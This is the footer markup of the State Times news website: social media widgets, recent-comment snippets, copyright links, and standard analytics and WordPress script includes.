                                    <a href="https://plus.google.com/+StateTimes1"  target="_blank">
                                        <div class="sc-head">
                                        <i class="fa-icon-google-plus"></i>
                                        <span>google+</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>147</span>
                                        followers                                    </div>
                                </li>
                                
                                
                                
                                
                                
                                
                                
				
                                                            </ul>
                        </div>
</div>			</div>
			<div class="one_fourth">
		<div class="widget momizat-facebook"><div class="widget-head"><h3 class="widget-title"><span>State Times on Facebook</span></h3></div>                <div class="mom_facebook_likebox" style="background:#fff;border:1px solid #e5e5e5;">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/statetimes&amp;width=263&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:290px;" allowTransparency="true"></iframe>

</div><!--like_box_footer-->

</div>			</div>
			<div class="one_fourth">
			        			</div>
			<div class="one_fourth last">
		<div class="widget momizat-recent_comments"><div class="widget-head"><h3 class="widget-title"><span>Recent Comments</span></h3></div>  <div class="mom-recent-comments">
                            <ul>
                                <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/india-to-land-on-moon-in-april-jitendra/#comment-6424" title="Shan Dar on India to land on Moon in April: Jitendra"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/india-to-land-on-moon-in-april-jitendra/#comment-6424" title="Shan Dar on India to land on Moon in April: Jitendra">Shan Dar</a> <time>on 23 Feb </time><span class="rc-post">in: <a href="http://news.statetimes.in/india-to-land-on-moon-in-april-jitendra/">India to land on Moon in April: Jitendra</a></span></h4>
                                    <p>India may land on Moon but Indian people are dying due to hunger on th ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/india-to-land-on-moon-in-april-jitendra/#comment-6424" title="Shan Dar on India to land on Moon in April: Jitendra">Read more</a>
 -->                                    </div>
                                </li>
                                                          <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/alarming-trends/#comment-6057" title="Dr. N. C. Asthana, IPS, Director General of Police (Modernization), Kerala, India on Alarming trends"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/alarming-trends/#comment-6057" title="Dr. N. C. Asthana, IPS, Director General of Police (Modernization), Kerala, India on Alarming trends">Dr. N. C. Asthana, IPS, Director General of Police (Modernization), Kerala, India</a> <time>on 13 Jan </time><span class="rc-post">in: <a href="http://news.statetimes.in/alarming-trends/">Alarming trends</a></span></h4>
                                    <p>Regarding the alleged use of the so-called armor-piercing 7.62x39mm bu ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/alarming-trends/#comment-6057" title="Dr. N. C. Asthana, IPS, Director General of Police (Modernization), Kerala, India on Alarming trends">Read more</a>
 -->                                    </div>
                                </li>
                          
                            </ul>
        </div>
</div>			</div>
	    
        <div class="clear"></div>
                </div> <!--// footer inner-->
            </footer> <!--//footer-->
            <div class="copyrights-area">
                <div class="inner">
                    <p class="copyrights-text">© 2017 <a href="#">State Times Daily Newspaper</a></p>
                        <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>				                <div class="responsive-toggle">
                	<a class="desktop-version" href="?responsive=false">Desktop Version</a>
                	<a class="mobile-version" href="?responsive=true">Mobile Version</a>
                </div>
                                </div>
           </div>
            <div class="clear"></div>
        </div> <!--Boxed wrap-->
        <a href="#" class="scrollToTop button"><i class="enotype-icon-arrow-up"></i></a>	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-16385353-2', 'auto');
  ga('require', 'displayfeatures');
  ga('require', 'linkid', 'linkid.js');
  ga('send', 'pageview');

</script>        <script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/comment-reply.min.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/news.statetimes.in\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/plugins.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/news.statetimes.in\/wp-admin\/admin-ajax.php","nonce":"ca2a0f7da7","success":"check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","werror":"Enter a valid city name.","nomore":"No More Posts","homeUrl":"http:\/\/news.statetimes.in","viewAll":"View All","noResults":"Sorry, no posts matched your criteria","bodyad":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/main.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/jquery.nicescroll.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/wp-embed.min.js?x39047'></script>
<script async="async" type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/akismet/_inc/form.js?x39047'></script>
    </body>
</html>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using disk 

Served from: news.statetimes.in @ 2018-04-01 22:44:53 by W3 Total Cache
-->